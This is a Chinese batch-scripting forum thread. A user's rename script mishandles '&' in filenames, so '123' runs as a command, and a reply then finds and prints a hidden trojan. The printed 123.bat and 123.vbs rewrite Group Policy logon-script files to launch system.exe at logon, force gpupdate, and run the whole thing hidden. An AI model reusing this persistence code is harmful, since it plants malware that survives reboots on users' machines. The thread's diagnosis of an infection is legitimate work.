[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[系统相关] 问个关于指令123就自动启动组策略更新的BUG

前几天我觉得每次批量改名就要打开有GUI的批量改名程序实在麻烦,就想要弄个鼠标右键菜单里能够一键批量改名的bat脚本

脚本写出来后,特殊字符基本能支持,但据说由于cmd内部的bug,不会把引号内部的&视为转义字符,所以这个符号&无解。然后,我测试&时,用了两个文件
abc & 123.txt
abc&123.txt

然后我就遇到组策略更新的BUG了,一旦启动批量改名的脚本,cmd就会自动更新组策略。然后,我在开始菜单运行gpedit.msc,发现组策略被拒绝访问了!

系统还原后,组策略恢复了,然后我又研究了下这问题——特殊字符&后面的字符,会被错误地视为第二个命令,于是,cmd启动组策略更新的指令竟然是123!
我打开cmd验证下猜想,输入123,然后组策略又被更新了!马上关闭cmd,但之后运行gpedit.msc,发现组策略又被拒绝访问了!
之后我第二次系统还原恢复组策略……

我想问这个关于组策略更新的BUG有办法解决么?(我的系统是Win 7 sp1 64位)
首先,更新组策略这么重要敏感的指令,怎么用个123就能启动了……不小心输错不就危险了?
其次,在不开启UAC的前提下(我真的不能开,开了的话一些破解软件的补丁就无效了),能否禁止cmd命令更新组策略?最好还能禁止cmd对注册表以及其它重要系统设置的改动……
既然cmd对特殊字符&无解,那么一旦文件名里&符号后面有123或者其它能破坏系统的指令,那么我的批量改名脚本就变成危险的病毒了……

PS:现在我在研究powershell,初步看上去这个安全一些……

回复 3# ckz1211


    还有倒数第二行那个system.exe
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

1  楼主错误地搞了个文件改名的bat代码 abc & 123.txt ,发现123作为命令运行了。-----带有&符号的改名,却实可用powershell避开。
2 123 运行后,楼主组策略被改了。后来查找发现,有一个123.bat,这是个隐藏的黑客脚本。-----这里告诫大家不要用xp,要用win7以上,这些系统中有uac,cmd中,默认非管理员权限,运行上述黑客脚本,那么黑客脚本中的第一句话,md %windir%\system32\GroupPolicy\User\Scripts,就会拒绝访问。


uac必须开启,才安全,否则,请用虚拟机运行程序。

如果非不听我老人家的话,必然中黑客脚本!!!

必然被脚本黑客玩到死!!!
脚本是写给人看的,是写给用户看的,而不是写给机子看的
用户能看懂、会修改的脚本,才是好脚本。
写易懂的powershell脚本帮人解决问题,进而让用户学会自渔,吾所愿也

TOP

我搜索了一下"123",在系统文件夹C:\Windows下面发现了两个可疑文件
123.bat
  1. @echo off
  2. md %windir%\system32\GroupPolicy\User\Scripts
  3. set di=%windir%\system32\GroupPolicy\User\Scripts
  4. attrib -a -s -r -h %di%\scripts.ini
  5. del %di%\scripts.ini /q
  6. echo.>%di%\scripts.ini
  7. echo [Logon] >>%di%\scripts.ini
  8. echo 0CmdLine=system.exe >>%di%\scripts.ini
  9. echo 0Parameters= >>%di%\scripts.ini
  10. attrib +s +a +r +h %di%\scripts.ini
  11. set ei=%windir%\system32\GroupPolicy
  12. attrib -a -s -r -h %ei%\gpt.ini
  13. del %ei%\gpt.ini /q
  14. echo [General]>%ei%\gpt.ini
  15. echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B66650-4972-11D1-A7CA-0000F87571E3}] >>%ei%\gpt.ini
  16. echo Version=65536 >>%ei%\gpt.ini
  17. attrib +s +a +r +h %ei%\gpt.ini
  18. md %windir%\system32\GroupPolicy\User\Scripts\Logon
  19. md %windir%\system32\GroupPolicy\User\Scripts\Logoff
  20. copy system.exe %di%\Logon /y
  21. gpupdate /force
复制代码
123.vbs
  1. Set ws = CreateObject("Wscript.Shell")
  2. ws.run "cmd /c 123.bat",vbhide
复制代码
这俩的创建时间2013年9月20日0点19分
妥妥的木马,居然潜伏了这么久!

TOP

能否把你的脚本贴出来看看
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

返回列表